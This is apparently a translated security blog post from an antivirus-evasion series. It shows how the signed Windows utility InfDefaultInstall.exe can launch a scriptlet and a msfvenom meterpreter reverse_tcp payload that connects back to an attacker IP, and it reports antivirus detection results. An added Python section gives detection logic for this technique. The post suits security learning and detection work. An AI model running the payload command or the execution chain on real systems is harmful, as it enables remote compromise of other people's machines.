This post was last edited by wholesome on 2020-3-31 20:21
Disclaimer: the techniques, ideas and tools covered in this article are provided solely for security-oriented learning and exchange. No one may use them for illegal purposes or for profit; anyone who does bears the consequences themselves. Packaged download of the article and related software: https://github.com/TideSec/BypassAntiVirus
1. Overview of InfDefaultInstall.exe
InfDefaultInstall.exe is a Microsoft-signed utility for performing INF installations. It is located at:
- C:\Windows\System32\Infdefaultinstall.exe
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZQQnpWZmt3c1gyRjhOc2N1bzdYcG9YMUpQMzFEcDZ4UEY5Nmdnd3E4ZmxEbDVVcjBkaWNSS1NnLzY0MA?x-oss-process=image/format,png)
Because the binary itself is signed, running it with an INF file as its argument can be used to bypass certain restrictions.
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZFOUpWV3RyVURPUzVWWU1vaWEyT3lWa2dTVUZ5OHZLdnB1aWJ3UW5CVjZleWI2UDMwVmNrOEt5dy82NDA?x-oss-process=image/format,png)
2. Using InfDefaultInstall.exe to execute a program
- PoC: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
Demonstrating on the local machine; the code of shady2.inf is shown below:
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3Zna0dZM0x5aWFZVHpQNmtzUEw3dkpsUk1GRFFQWXliYmVQcEFieFhxRjE2SXlvTW9QVTR2bzNRLzY0MA?x-oss-process=image/format,png)
Below is the code of shady.sct; as you can see, it ends up launching notepad.exe:
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZDelRxa2NaNjRoM2FxTHhZNEk5eXBpYUdLNXZNTHJJRjV3dEk1SzhUMWt3cXJLYnVMSHl3bWp3LzY0MA?x-oss-process=image/format,png)
Run the following in a cmd window:
- InfDefaultInstall.exe "C:\Users\Administrator\Desktop\inf_catalog_signing_poc-master\shady\shady 2.inf"
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZJdDN0UjRiMU5aaFhnU2VmZTk0eTlla2VLU2F4RUZoYVp2cTdzd0kyR2lhTkpqU0xiZG5CdndnLzY0MA?x-oss-process=image/format,png)
3. Using InfDefaultInstall.exe to execute a payload
Target machine: Windows 10, IP address 172.16.111.194
Attacker machine: Kali Linux, IP address 172.16.111.222
First, use msf to generate shellcode in exe format:
- msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=172.16.111.222 lport=3333 -f exe > ./hacker.exe
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3YyQzZXcDNMV2FlVFpmeGxKZlVlYWFJdEdTaWM2aWNkVW1nN3dwSEtWZHR6aWJmZ2pmblJLN1ZVSHcvNjQw?x-oss-process=image/format,png)
Copy the generated exe trojan to the target machine, make a backup copy of the INF as shady222.inf, and change the file path in shady.sct to hacker.exe:
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZlcXRRd3diOU1mTzUyNXVpYkkzUkVISm1QN250NGF5UjhHMnU2SERWcnMzeTF3MDBlbWFQbjNBLzY0MA?x-oss-process=image/format,png)
Set up the listener in msf:
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3YxVFVpY21kZmFCY2lhTVhGd2ljdFVnWlNnNE5UaWJyT1pnaWJqZjRseVFkdlNQaWNpYjBjWXk4aWF4YmlhSHcvNjQw?x-oss-process=image/format,png)
On the target machine, run shady222.inf with InfDefaultInstall.exe:
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZuZXlvZTBITXM1eFRrdzh3Y1l6QU9yYjl5MlJ0QzVkNVl4bUhlcld0clByckNpYk1EWWp3TjNBLzY0MA?x-oss-process=image/format,png)
The Kali attacker machine successfully receives the target's session:
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3Y2bG5maWNjOUhPZklqSU1sS3FYbVZ0NDFCbDhROWpvUHJuZXZZaWFnNVdTdm0zZXdNUlBwbzRzdy82NDA?x-oss-process=image/format,png)
Below is the result of running InfDefaultInstall.exe after the 360 suite and Huorong antivirus were installed on the target: the 360 suite flags it as malicious and Kali receives no session.
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3Z2Vzg0VEdqMzN6amliTURNTjNyQmxZZGdHRDVvbmxUNTZHS3lLa2tac3ltcFQ2RmdqVkhrWmxnLzY0MA?x-oss-process=image/format,png)
Huorong flags it as malicious and Kali receives no session.
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZmRzM2QU9Cd0ZqV0pzNkNKOVF6b0dpYkZMUHY4ZGN5dWVZZFFvc2ROUUZhTDljSkdZcmZWYXZnLzY0MA?x-oss-process=image/format,png)
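From the defender's side, the procedure above leaves two artifacts worth hunting for: a process-creation event for InfDefaultInstall.exe whose INF argument lives outside the trusted INF directory, and an INF whose install directives hand control to scrobj.dll or a .sct scriptlet. The following Python is an added example, not code from the post or the PoC repository; the event records, the INF text and the paths in them are constructed, and the `%11%` (System32) line stands in for whatever the real shady2.inf contains.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (Sysmon EID 1 / 4688 style); not from the page.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\InfDefaultInstall.exe",
     "cmdline": r'InfDefaultInstall.exe "C:\Users\Administrator\Desktop\shady\shady 2.inf"'},
    {"image": r"C:\Windows\System32\InfDefaultInstall.exe",
     "cmdline": r"InfDefaultInstall.exe C:\Windows\INF\oem12.inf"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Constructed INF text. Directive names are real INF keys; the .sct path is a placeholder.
SAMPLE_INF = r"""[Version]
Signature=$CHICAGO$

[DefaultInstall]
UnRegisterOCXs=UnRegOCXs

[UnRegOCXs]
%11%\scrobj.dll,NI,C:\Users\Public\placeholder.sct
"""

INF_ARG = re.compile(r'"([^"]+\.inf)"|(\S+\.inf)', re.IGNORECASE)
TRUSTED_INF_DIR = PureWindowsPath(r"C:\Windows\INF")
# INF directives that make setupapi run code or register COM objects during install.
EXEC_DIRECTIVES = ("RunPreSetupCommands", "RunPostSetupCommands",
                   "RegisterOCXs", "UnRegisterOCXs")


def inf_argument(cmdline):
    """Return the .inf path passed on the command line (quoted or bare), or None."""
    m = INF_ARG.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def suspicious_event(ev):
    """True when InfDefaultInstall.exe installs an INF from outside the trusted INF dir."""
    if PureWindowsPath(ev["image"]).name.lower() != "infdefaultinstall.exe":
        return False
    inf = inf_argument(ev["cmdline"])
    if inf is None:
        return True  # no recognisable INF argument: unusual, worth a look
    return TRUSTED_INF_DIR not in PureWindowsPath(inf).parents


def inf_findings(text):
    """Return INF lines that use code-running directives or reference scrobj.dll/.sct."""
    hits = []
    for line in text.splitlines():
        s = line.strip()
        if s.startswith(EXEC_DIRECTIVES) or re.search(r"scrobj\.dll|\.sct\b", s, re.I):
            hits.append(s)
    return hits
```

The path check is deliberately coarse: a legitimate driver INF installed from a vendor folder will also trip it, so treat the event as a lead to be paired with the INF contents rather than a verdict on its own.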
4. References
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f